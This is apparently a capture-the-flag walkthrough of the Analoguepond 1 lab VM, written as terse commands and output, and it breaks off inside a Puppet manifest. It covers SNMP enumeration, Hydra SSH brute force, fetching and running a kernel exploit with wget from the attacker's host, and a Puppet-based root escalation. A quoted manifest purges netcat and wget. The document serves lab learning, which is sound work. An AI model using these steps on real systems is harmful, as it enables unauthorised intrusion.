Created
July 30, 2017 20:38
-
-
Save SecurityIsIllusion/d4dac7810486fe4bb495e159b795a793 to your computer and use it in GitHub Desktop.
Analoguepond 1 Walkthrough
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
IP: 192.168.43.254 | |
nmap 192.168.43.254 -A | |
port 22 was open | |
nmap 192.168.43.254 -sU -v | |
port 22 | |
port 161 udp | |
192.168.43.254 -sU -sS -v | |
PORT STATE SERVICE | |
161/udp open snmp | |
MAC Address: 08:00:27:C9:D4:07 (Oracle VirtualBox virtual NIC) | |
snmpwalk -c public 192.168.43.254 -v 1 | |
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64" | |
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 | |
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95 | |
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>" | |
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond" | |
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..." | |
iso.3.6.1.2.1.1.7.0 = INTEGER: 72 | |
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 | |
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 | |
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49 | |
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4 | |
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 | |
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1 | |
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 | |
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 | |
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching." | |
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model." | |
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB." | |
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" | |
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations" | |
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations" | |
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" | |
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP." | |
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." | |
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." | |
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27 | |
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00 | |
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 | |
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro | |
" | |
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 | |
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26 | |
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 | |
End of MIB | |
snmpwalk -c public 192.168.43.254 -v 1 | |
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64" | |
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 | |
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95 | |
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>" | |
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond" | |
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..." | |
iso.3.6.1.2.1.1.7.0 = INTEGER: 72 | |
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1 | |
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1 | |
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 | |
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49 | |
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4 | |
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 | |
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1 | |
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 | |
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 | |
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching." | |
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model." | |
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB." | |
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" | |
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations" | |
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations" | |
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" | |
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP." | |
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." | |
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." | |
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01 | |
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27 | |
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00 | |
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 | |
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro | |
" | |
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 | |
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26 | |
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 | |
enum4linux -U 192.168.43.254 | |
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 23 02:56:13 2017 | |
========================== | |
| Target Information | | |
========================== | |
Target ........... 192.168.43.254 | |
RID Range ........ 500-550,1000-1050 | |
Username ......... '' | |
Password ......... '' | |
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none | |
====================================================== | |
| Enumerating Workgroup/Domain on 192.168.43.254 | | |
====================================================== | |
[E] Can't find workgroup/domain | |
======================================= | |
| Session Check on 192.168.43.254 | | |
======================================= | |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. | |
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. | |
google There is house in new orleans... | |
cewl http://www.azlyrics.com/lyrics/bobdylan/houseoftherisinsun.html > /root/Desktop/analougepnd/profile.txt | |
my ip was blocked when i again tried | |
so i copied the lyrics and hosted it as profiler.php on my apache and then i ran cewl to get wordlist for ssh hydra | |
cewl -d 2 -m 6 -w /root/Desktop/analougepnd/profile.txt http://192.168.43.95/profiler.php | |
after adding some more words/usernames obtained from snmp enumeration, it's hydra time. but manual brutefore may also work. | |
hydra -e nsr -L /root/Desktop/analougepnd/profile.txt -P /root/Desktop/analougepnd/profile.txt 192.168.43.254 ssh | |
[22][ssh] host: 192.168.43.254 login: eric password: therisingsun | |
ssh eric@192.168.43.254 | |
therisingsun | |
id | |
uid=1000(eric) gid=1000(eric) groups=1000(eric),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare) | |
uname -a | |
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux | |
pwd | |
/home/eric | |
ls | |
reticulatingsplines.gif | |
file reticulatingsplines.gif | |
reticulatingsplines.gif: GIF image data, version 89a, 382 x 359 | |
scp reticulatingsplines.gif root@192.168.43.95:/root/Desktop/analougepond | |
A Joke | |
Privilege Escalation | |
Overlays Exploit worked. | |
https://www.exploit-db.com/exploits/39166/ | |
Download it | |
Compile and copy it in /var/www/html | |
wget http://192.168.43.95/39166 | |
chmod 777 39166 | |
./39166 | |
eric@analoguepond:~$ ./39166 | |
root@analoguepond:~# | |
id | |
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric) | |
ls | |
flag.txt | |
cat flag.txt | |
C'Mon Man! Y'all didn't think this was the final flag so soon...? | |
Did the bright lights and big city knock you out...? If you pull | |
a stunt like this again, I'll send you back to Walker... | |
This is obviously troll flah #1 So keep going. | |
Troll Flag | |
ifconfig | |
eth0 Link encap:Ethernet HWaddr 08:00:27:c9:d4:07 | |
inet addr:192.168.43.254 Bcast:192.168.43.255 Mask:255.255.255.0 | |
inet6 addr: fe80::a00:27ff:fec9:d407/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:47685 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:49456 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:1000 | |
RX bytes:4655624 (4.6 MB) TX bytes:8767032 (8.7 MB) | |
lo Link encap:Local Loopback | |
inet addr:127.0.0.1 Mask:255.0.0.0 | |
inet6 addr: ::1/128 Scope:Host | |
UP LOOPBACK RUNNING MTU:65536 Metric:1 | |
RX packets:4 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:0 | |
RX bytes:372 (372.0 B) TX bytes:372 (372.0 B) | |
virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25 | |
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:636 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:606 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:0 | |
RX bytes:38700 (38.7 KB) TX bytes:48160 (48.1 KB) | |
vnet0 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7 | |
inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:2207 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:8181 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:500 | |
RX bytes:982112 (982.1 KB) TX bytes:1388441 (1.3 MB) | |
vnet1 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a | |
inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link | |
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | |
RX packets:2167 errors:0 dropped:0 overruns:0 frame:0 | |
TX packets:7382 errors:0 dropped:0 overruns:0 carrier:0 | |
collisions:0 txqueuelen:500 | |
RX bytes:1064317 (1.0 MB) TX bytes:1249030 (1.2 MB) | |
iptables -L | |
Chain INPUT (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT udp -- anywhere anywhere udp dpt:domain | |
ACCEPT tcp -- anywhere anywhere tcp dpt:domain | |
ACCEPT udp -- anywhere anywhere udp dpt:bootps | |
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps | |
Chain FORWARD (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED | |
ACCEPT all -- 192.168.122.0/24 anywhere | |
ACCEPT all -- anywhere anywhere | |
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable | |
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable | |
Chain OUTPUT (policy ACCEPT) | |
target prot opt source destination | |
ACCEPT udp -- anywhere anywhere udp dpt:bootpc | |
arp -n | |
Address HWtype HWaddress Flags Mask Iface | |
192.168.43.67 ether 08:00:27:4d:1b:bb C eth0 | |
192.168.43.95 ether 08:00:27:4d:1b:bb C eth0 | |
192.168.122.3 ether 52:54:00:6d:93:6a C virbr0 | |
192.168.122.2 ether 52:54:00:5b:05:f7 C virbr0 | |
192.168.43.185 ether 9c:ad:97:ce:5d:21 C eth0 | |
192.168.43.1 ether 00:27:15:44:59:47 C eth0 | |
arp -a | |
? (192.168.43.67) at 08:00:27:4d:1b:bb [ether] on eth0 | |
kali (192.168.43.95) at 08:00:27:4d:1b:bb [ether] on eth0 | |
barringsbank.example.com (192.168.122.3) at 52:54:00:6d:93:6a [ether] on virbr0 | |
puppet.example.com (192.168.122.2) at 52:54:00:5b:05:f7 [ether] on virbr0 | |
hulk (192.168.43.185) at 9c:ad:97:ce:5d:21 [ether] on eth0 | |
? (192.168.43.1) at 00:27:15:44:59:47 [ether] on eth0 | |
ssh root@192.168.122.3 | |
ssh_exchange_identification: read: Connection reset by peer | |
root@analoguepond:/root# ssh root@192.168.122.2 | |
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established. | |
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5. | |
Are you sure you want to continue connecting (yes/no)? yes | |
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts. | |
+-----------------------------------------------------------------------------+ | |
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her | | |
| most famous song | | |
+-----------------------------------------------------------------------------+ | |
root@192.168.122.2's password: | |
https://en.wikipedia.org/wiki/Sandie_Shaw | |
Sandie Shaw, MBE (born Sandra Ann Goodrich; 26 February 1947) is an English singer. One of the most successful British female singers of the 1960s, in 1967 the song "Puppet on a String" performed by her became the first British entry to win the Eurovision Song Contest. After a long and successful career, Shaw announced her retirement from the music industry in 2013 | |
ssh sandieshaw@192.168.122.2 | |
puppetonastring | |
ps aux | grep puppet | |
puppet 976 1.4 5.9 449568 60348 ? Ssl 07:26 3:09 /usr/bin/ruby /usr/bin/puppet master | |
root 7269 0.1 0.0 4448 848 ? Ss 11:10 0:00 /bin/sh -c /usr/bin/puppet agent --test > /dev/null 2>&1 | |
root 7270 53.2 5.0 286100 50876 ? Sl 11:10 0:36 /usr/bin/ruby /usr/bin/puppet agent --test | |
root 7474 0.0 4.5 287024 46312 ? Rl 11:11 0:00 /usr/bin/ruby /usr/bin/puppet agent --test | |
sandies+ 7478 0.0 0.2 11756 2148 pts/0 S+ 11:11 0:00 grep puppet | |
cd /etc/puppet | |
ls | |
auth.conf etckeeper-commit-post files manifests puppet.conf | |
environments etckeeper-commit-pre fileserver.conf modules templates | |
cd manifests/ | |
ls | |
environments.conf nodes.pp site.pp | |
cat environments.conf | |
manifest = $confdir/manifests/site.pp | |
manifestdir = $confdir/manifests | |
modulepath = $confdir/modules | |
sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp | |
node 'default' { | |
include vulnhub | |
} | |
node 'puppet.example.com' inherits 'default' { | |
include wiggle | |
} | |
node 'barringsbank.example.com' inherits 'default' { | |
} | |
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp | |
node 'default' { | |
include vulnhub | |
} | |
node 'puppet.example.com' inherits 'default' { | |
include wiggle | |
} | |
node 'barringsbank.example.com' inherits 'default' { | |
include fiveeights | |
} | |
sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp | |
## Module to unwind changed #vulnhub people make. This will unwind the most | |
## common vectors they used to get at my other VMs | |
class vulnhub { | |
## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh) | |
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional", | |
"ncat", "netdiscover", "lftp" ] | |
package { $purge: | |
ensure => purged, | |
} | |
## The encryption is still primative Egyptian (Hello drweb) | |
$theresas_nightmare = [ "cryptcat", "socat" ] | |
package { $theresas_nightmare: | |
ensure => present, | |
} | |
## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub) | |
file { "/etc/sudoers.d": | |
ensure => "directory", | |
recurse => true, | |
purge => true, | |
force => true, | |
owner => root, | |
group => root, | |
mode => 0755, | |
source => "puppet:///modules/vulnhub/sudoers.d", | |
} | |
## revert /etc/passwd (Hey rfc, kevinnz!) | |
file {'/etc/sudoers': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0440, | |
source => "puppet:///modules/vulnhub/sudoers", | |
} | |
## revert /etc/passwd (Hey Rasta_Mouse!) | |
file {'/etc/passwd': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-passwd", | |
} | |
## and /etc/group (Hello to you cmaddy) | |
file {'/etc/group': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-group", | |
} | |
## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!) | |
file {'/etc/ssh/ssd_config': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-sshd_config", | |
notify => Service["ssh"], | |
} | |
## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like | |
## Gibson | |
cron { "puppet check in": | |
command => "/usr/bin/puppet agent --test > /dev/null 2>&1", | |
user => "root", | |
minute => "*/10", | |
ensure => present, | |
} | |
## Everyone forbidden by default (Hey wrboyce, rasta_mouse, 8bitkiwi) | |
file {'/etc/hosts.deny': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/hosts.deny", | |
} | |
## Firewall off to only specific hosts (Hello Bas!) | |
file {'/etc/hosts.allow': | |
ensure => present, | |
owner => root, | |
group => root, | |
mode => 0644, | |
source => "puppet:///modules/vulnhub/${hostname}-hosts.allow", | |
} | |
## Don't fill up the disk (Hey GlobalMaquereau, g0bl1n) | |
tidy { "/var/lib/puppet/reports": | |
age => "1h", | |
recurse => true, | |
} | |
## Changing openssh config requires restart | |
service { 'ssh': | |
ensure => running, | |
enable => true, | |
hasstatus => true, | |
hasrestart => true, | |
} | |
} | |
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c | |
#include <stdio.h> | |
#include <unistd.h> | |
void | |
advance_spinner() { | |
static char bars[] = { '/', '-', '\\', '|' }; | |
static int nbars = sizeof(bars) / sizeof(char); | |
static int pos = 0; | |
printf("%c\r", bars[pos]); | |
fflush(stdout); | |
pos = (pos + 1) % nbars; | |
} | |
int | |
main() { | |
while (1) { | |
advance_spinner(); | |
usleep(300); | |
} | |
return 0; | |
} | |
We need to get root of sandieshaw. | |
We have spin which is copied to /tmp by puppet with root privileges. | |
Since, there is no C Compiler so we compile on our machine or eric's machine and scp to sandieshaw on directory /etc/puppet/modules/wiggle/files | |
Then wait for puppet to copy spin to temp. | |
Once it is copied, ./spin and we are root. | |
./spin | |
# id | |
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw) | |
whoami | |
root | |
cd /root | |
# ls | |
protovision | |
# cd protovision | |
# ls | |
flag1.txt.0xff jim melvin | |
# cat flag1.txt.0xff | |
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e33636842 | |
48496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d | |
79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e | |
585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264 | |
763032626a35535a6956486431395765756333643339794c364d486330524861 | |
# cat jim | |
Mr Potato Head! Backdoors are not a... | |
# cat melvin | |
Boy you guys are dumb! I got this all figured out... | |
http://www.convertstring.com/EncodeDecode/HexDecode | |
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyA | |
SbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02b | |
j5SZiVHd19Weuc3d39yL6MHc0RHa | |
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dG | |
VzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg== | |
echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dGVzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==' | base64 -d | |
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something... | |
Mr Potato Head! Backdoors are not a... Secret | |
Boy you guys are dumb! I got this all figured out... Maize | |
la -alh | |
.I_have_you_now | |
cd .I_have_you_now | |
ls -alh | |
a | |
grauniad_1995-02-27.jpeg | |
scp grauniad_1995-02-27.jpeg root@192.168.43.95:/root/Desktop/ | |
cd /root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z | |
ls -alh | |
my_world_you_are_persistent_try | |
nleeson_key.gpg | |
cat my_world_you_are_persistent_try | |
joshua | |
i was having some issue with decrypting the gpg file so i copied it to my kali machine. | |
gpg nleeson_key.gpg | |
gpg: CAST5 encrypted data | |
gpg: gpg-agent is not available in this session | |
gpg: encrypted with 1 passphrase | |
gpg: error creating `nleeson_key': Permission denied | |
gpg: WARNING: message was not integrity protected | |
gpg nleeson_key.gpg | |
gpg nleeson_key.gpg | |
gpg: keybox '/root/.gnupg/pubring.kbx' created | |
gpg: WARNING: no command supplied. Trying to guess what you mean ... | |
gpg: CAST5 encrypted data | |
gpg: encrypted with 1 passphrase | |
gpg: WARNING: message was not integrity protected | |
root@kali:~/Desktop/analougepnd# cat nleeson_key | |
-----BEGIN RSA PRIVATE KEY----- | |
Proc-Type: 4,ENCRYPTED | |
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16 | |
RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8 | |
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK | |
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6 | |
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8 | |
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD | |
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9 | |
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy | |
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37 | |
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM | |
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO | |
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym | |
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ | |
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e | |
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE | |
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg | |
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4 | |
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2 | |
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP | |
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC | |
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO | |
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb | |
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB | |
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT | |
fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx | |
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB | |
-----END RSA PRIVATE KEY----- | |
export TERM=xterm | |
chmod 777 nleeson_key | |
ssh -i nleeson_key nleeson@192.168.122.3 | |
joshua | |
nleeson@barringsbank:~$ id | |
uid=1000(nleeson) gid=1000(nleeson) groups=1000(nleeson),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare) | |
nleeson@barringsbank:~$ ls | |
reticulatingsplines.gif | |
nothing... | |
Let's go back to other user. | |
cat /etc/puppet/modules/fiveeights/manifests/init.pp | |
## Nick's secret file hide the screw-ups | |
class fiveeights { | |
## private key held elsewhere. Keep looking | |
file { '/home/nleeson/.ssh/authorized_keys': | |
